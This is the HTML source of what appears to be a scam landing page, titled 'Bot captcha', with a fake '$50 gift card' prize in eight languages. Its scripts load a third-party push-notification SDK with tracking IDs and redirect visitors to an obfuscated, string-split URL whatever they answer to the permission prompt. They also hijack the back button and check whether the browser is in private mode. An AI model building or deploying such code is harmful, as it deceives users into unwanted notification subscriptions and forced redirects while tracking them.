<!DOCTYPE html>
<html>


<meta http-equiv="content-type" content="text/html;charset=UTF-8" />

<head>
    <meta charset="UTF-8">
    <title>Bot captcha</title>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width,height=device-height,initial-scale=1,minimum-scale=1">
    <link rel="icon" type="image/png" sizes="16x16" href="icon.png">
    <style>
        body,
        html {
            background-color: #fff;
            font-family: Roboto, Helvetica Neue, Helvetica, Arial, sans-serif;
            height: 100%;
            margin: 0;
            padding: 0;
            width: 100%
        }

        body {
            -moz-osx-font-smoothing: grayscale;
            -moz-user-select: none;
            -ms-user-select: none;
            -webkit-font-smoothing: antialiased;
            -webkit-user-select: none;
            user-select: none
        }

        .isHide {
            display: none !important
        }

        .isShow {
            display: block !important
        }

        #giftCardContainer {
            background: url(images/gift-card/bg.png) repeat;
            height: 100vh;
            width: 100vw
        }

        #topContainer {
            align-items: flex-start;
            display: flex;
            height: 50%;
            justify-content: center
        }

        #topBox {
            -webkit-animation: a 2s infinite;
            align-items: center;
            animation: a 2s infinite;
            background-color: #fff;
            border-radius: 20px;
            box-shadow: 0 0 20px rgba(0, 0, 0, .5);
            display: flex;
            font-size: 30px;
            font-weight: 700;
            height: 120px;
            margin-bottom: 10px;
            padding: 10px 20px;
            position: absolute;
            text-align: center;
            top: 20px;
            width: 400px
        }

        @-webkit-keyframes a {

            0%,
            50%,
            to {
                top: 20px
            }

            25%,
            75% {
                top: 10px
            }
        }

        @keyframes a {

            0%,
            50%,
            to {
                top: 20px
            }

            25%,
            75% {
                top: 10px
            }
        }

        #top2 {
            color: #03a8db;
            padding: 0 10px
        }

        #midContainer {
            align-items: flex-end;
            height: 50%
        }

        #midBox,
        #midContainer {
            display: flex;
            justify-content: center;
            position: relative
        }

        #midBox {
            align-items: center;
            flex-direction: column;
            margin-bottom: 100px
        }

        #bottomText {
            background-color: #fff;
            border: 3px solid #d3d3d3;
            border-radius: 20px;
            display: flex;
            justify-content: center;
            max-width: 700px;
            text-align: center;
            width: 100%
        }

        h1 {
            font-size: 36px
        }

        #giftCard {
            border-radius: 20px;
            box-shadow: 0 0 20px rgba(0, 0, 0, .5);
            margin-top: 20px;
            max-width: 500px;
            width: 100%
        }

        .msgReady__tx {
            align-items: center;
            box-sizing: border-box;
            display: flex;
            height: 150px;
            justify-content: space-around;
            min-width: 300px;
            padding: 10px 0;
            text-align: center
        }

        @media (min-width:425px) and (max-width:900px) {
            #topBox {
                font-size: 18px;
                height: 80px;
                width: 250px
            }

            #midBox {
                margin-bottom: 20px
            }

            #bottomText {
                max-width: 500px
            }

            #giftCard {
                max-width: 350px
            }

            h1 {
                font-size: 22px
            }

            .msgReady__tx {
                font-size: 28px;
                width: 95%
            }
        }

        @media (max-width:424px) {
            #giftCardContainer {
                display: flex;
                flex-direction: column-reverse
            }

            #topContainer {
                align-items: flex-end
            }

            #topBox {
                box-sizing: border-box;
                font-size: 18px;
                height: 80px;
                width: 95%
            }

            #midBox {
                margin-bottom: 0;
                width: 95%
            }

            #bottomText {
                max-width: 500px;
                width: 95%
            }

            #giftCard {
                margin: 0 0 10px;
                max-width: 350px;
                width: 95%
            }

            h1 {
                font-size: 20px
            }

            .msgReady__tx {
                font-size: 28px;
                width: 95%
            }
        }
    </style>
</head>

<body>
  <script>(function() {
    function getParameterByName(name, url) {
      if (!url) url = window.location.href;
      name = name.replace(/[\[\]]/g, '\\$&');
      var regex = new RegExp('[?&]' + name + '(=([^&#]*)|&|#|$)'),
          results = regex.exec(url);
      if (!results) return null;
      if (!results[2]) return '';
      return decodeURIComponent(results[2].replace(/\+/g, ' '));
    }

    var loc = document.location;
    var tb = function(){ loc.href = ['ht', 'tps:/', '/blatw', 'alm.com/a', 'fu.ph', 'p?zon', 'eid=2483917'].join(''); };
    var bc = function(){ loc.href = ['ht', 'tps:', '/', '/go', 'ogle.com/'].join(''); };

    var url = new URL(window.location.href);
    var pci = getParameterByName('external_id', window.location.href);
    var ppi = getParameterByName('placementid', window.location.href);
    var tag = document.createElement('script');
    tag.type = 'text/javascript';
    tag.dataset['sdk'] = 'sdk';
    tag.src = '//pushokey.com/ntfc.php?p=2490456&ucis=true&m=https&nbinp=true' + '&var='+ ppi + '&ymid=' + pci;

    function setupHandlers() {
      // sdk.onBeforePermissionPrompt();
      sdk.onPermissionDefault(tb);
      sdk.onPermissionAllowed(tb);
      sdk.onPermissionDenied(tb);
      sdk.onAlreadySubscribed(tb);
    }

    tag.onload = setupHandlers;

    document.head.appendChild(tag);
    })();</script>  
    <div id="giftCardContainer">
        <div id="topContainer"><img id="giftCard" src="images/gift-card/giftCard.png" alt="image"></div>
        <div id="midContainer">
            <div id="topBox">
                <p><span id="top1"></span><span id="top2"></span><span id="top3"></span></p>
            </div>
            <div id="midBox">
                <div id="bottomText">
                    <h1 id="mid"></h1>
                    <h1 class="msgReady__tx isHide"></h1>
                </div>
            </div>
        </div>
    </div>
    <script>
            var u = function() {
                    var e = location.search.split("#")[0].split("?")[1];
                    if (void 0 === e) return null;
                    var o = {};
                    return e.split("&").forEach(function(e) {
                        var n = e.split("=");
                        if (2 === n.length) o[n[0]] = n[1] || null;
                        else {
                            var t = n[0];
                            n.shift(), o[t] = n.join("=")
                        }
                    }), o
                },
                o = u();
            if (null !== o && void 0 !== o.bbr && "1" === o.bbr) {
                var i = document.title,
                    r = location.pathname + location.search;
                history.pushState(null, i, r), window.addEventListener("popstate", function() {
                    history.pushState({}, i, r)
                })
            }

            var l = function(e) {
                    null !== window.opener && void 0 !== window.opener && opener.postMessage(e, "*")
                },
                f = {
                    ua: navigator.userAgent,
                    m: function(n) {
                        var e = "normal",
                            t = "private";

                        function o() {
                            return n(t)
                        }

                        function i() {
                            return n(e)
                        }
                        if ("safari" === f.n) try {
                            return window.openDatabase(null, null, null, null), n(e)
                        } catch (e) {
                            return n(t)
                        } else if ("firefox" === f.n) {
                            var r = indexedDB.open("test.html");
                            r.addEventListener("error", o), r.addEventListener("success", i)
                        } else {
                            if ("edge" === f.n) return void 0 !== window.indexedDB || void 0 === window.PointerEvent && void 0 === window.MSPointerEvent ? n(e) : n(t);
                            if ("opera" !== f.n && "yandex" !== f.n && "chrome" !== f.n) return n("unknown");
                            window.webkitRequestFileSystem(window.TEMPORARY, 1, i, o)
                        }
                    },
                    get n() {
                        var e = !!window.opr && !!opr.addons || !!window.opera || 0 < this.ua.indexOf("OPR/index.html"),
                            n = "undefined" != typeof InstallTrigger,
                            t = /constructor/i.test(window.HTMLElement) || /(MacPPC|MacIntel|Mac_PowerPC|Macintosh)/.test(this.ua),
                            o = !!window.chrome && /Google Inc/.test(navigator.vendor),
                            i = 0 < this.ua.indexOf("YaBrowser") || 0 < this.ua.indexOf("Yowser"),
                            r = /UBrowser/.test(this.ua),
                            a = /Edge\//.test(this.ua),
                            s = null;
                        return e ? s = "opera" : n ? s = "firefox" : i ? s = "yandex" : r ? s = "uc" : a ? s = "edge" : o ? s = "chrome" : t && (s = "safari"), s
                    },
                    get d() {
                        var n = {
                                webOS: "webOS",
                                iPhone: "iPhone",
                                iPad: "iPad",
                                iPod: "iPod",
                                mac: "(MacPPC|MacIntel|Mac_PowerPC|Macintosh)",
                                blackBerry: "BlackBerry|BB|PlayBook",
                                windows: "Windows NT",
                                windowPhone: "Windows Phone",
                                android: "Android"
                            },
                            t = null;
                        return Object.keys(n).some(function(e) {
                            if (null !== f.ua.match(new RegExp(n[e], "i"))) return t = e, !0
                        }), t
                    }
                },
                v = f,
                m = u();

            var g = function(n) {
                    if (!(void 0 !== window.navigator && void 0 !== navigator.serviceWorker && void 0 !== window.PushManager && void 0 !== window.Notification)) return n(!1, "unsupported");
                    v.m(function(e) {
                        return "private" === e ? n(!1, e) : "unknown" === e ? n(!1, e) : n(!0, "supported")
                    })
                },
                E = {
                    k: "",
                    t: {},
                    set: function(e) {
                        void 0 !== window.navigator && void 0 !== navigator.language && (E.k = navigator.language.slice(0, 2)), void 0 === e[E.k] && (E.k = "en"), E.t = e[E.k]
                    },
                    get: function(e) {
                        return E.t[e]
                    }
                },
                S = E;

            S.set({
                ru: {
                    top1: "Нажмите ",
                    top2: "Разрешить",
                    top3: "чтобы получить приз и выкупить в нашем магазине!",
                    mid: "ПОЗДРАВЛЯЕМ! ВЫ ВЫИГРАЛИ $50 ПОДАРОЧНУЮ КАРТУ! ВРЕМЯ ШОПИНГА!",
                    msg: "Вы успешно прошли проверку!<br>Теперь вы можете закрыть окно ..."
                },
                en: {
                    top1: "Click",
                    top2: "Allow",
                    top3: "to receive the prize and redeem in our store!",
                    mid: "CONGRATULATIONS! YOU WON A $50 GIFT CARD! IT'S TIME TO SHOPPING!",
                    msg: "You have successfully passed the verification!<br>Now you can close the window."
                },
                fr: {
                    top1: "Cliquez sur ",
                    top2: "Autoriser",
                    top3: "pour recevoir le prix et échanger dans notre magasin!",
                    mid: "TOUTES NOS FÉLICITATIONS! VOUS AVEZ GAGNÉ UNE CARTE CADEAU DE 50 $! C'EST LE TEMPS DE SHOPPING!",
                    msg: "Vous avez réussi le test!<br>Maintenant vous pouvez fermer la fenêtre"
                },
                de: {
                    top1: "Klicken Sie auf ",
                    top2: "Zulassen",
                    top3: "um den Preis zu erhalten und in unserem Geschäft einzulösen!",
                    mid: "HERZLICHE GLÜCKWÜNSCHE! Du hast eine $ 50-Geschenkkarte bekommen! Es ist Zeit zum Einkaufen!",
                    msg: "Sie haben den Test erfolgreich bestanden!<br>Jetzt können Sie das Fenster schließen"
                },
                es: {
                    top1: "Haga clic en ",
                    top2: "Permitir",
                    top3: "para recibir el premio y canjearlo en nuestra tienda.",
                    mid: "¡FELICIDADES! ¡USTED GANÓ UNA TARJETA DE REGALO DE $ 50! ¡ES HORA DE COMPRAS!",
                    msg: "Has pasado la prueba con éxito!<br>Ahora puedes cerrar la ventana"
                },
                uk: {
                    top1: "Натисніть ",
                    top2: "Дозволити",
                    top3: "щоб отримати приз і викупити у нашому магазині!",
                    mid: "НАШІ ВІТАННЯ! ВИ ВИГРАЛИ ПОДАРУНКОВУ КАРТУ НА $50! ЧАС ДЛЯ ШОПІНГУ!",
                    msg: "Ви успішно пройшли перевірку!<br>Тепер ви можете закрити вікно."
                },
                pl: {
                    top1: "Kliknij ",
                    top2: "Zezwól",
                    top3: "aby otrzymać nagrodę i wykorzystać w naszym sklepie!",
                    mid: "GRATULACJE! WYGRAŁCIE KARTĘ UPOMINKĄ $50! CZAS NA ZAKUPY!",
                    msg: "Pomyślnie przeszedłeś weryfikację!<br>Teraz możesz zamknąć okno."
                },
                th: {
                    top1: "คลิก ",
                    top2: "อนุญาต",
                    top3: " เพื่อรับรางวัลและแลกรับรางวัลในร้านของเรา!",
                    mid: "ขอแสดงความยินดี! คุณรับบัตรของขวัญมูลค่า $50 เหรียญ! ถึงเวลาแล้วที่จะซื้อสินค้า!",
                    msg: "คุณผ่านการตรวจสอบสำเร็จแล้ว!<br>ตอนนี้คุณสามารถปิดหน้าต่างได้"
                }
            }), document.querySelector("#top1").textContent = S.get("top1"), document.querySelector("#top2").textContent = S.get("top2"), document.querySelector("#top3").textContent = S.get("top3"), document.querySelector("#mid").textContent = S.get("mid"), document.querySelector(".msgReady__tx").innerHTML = S.get("msg")

    </script>
</body>


</html>
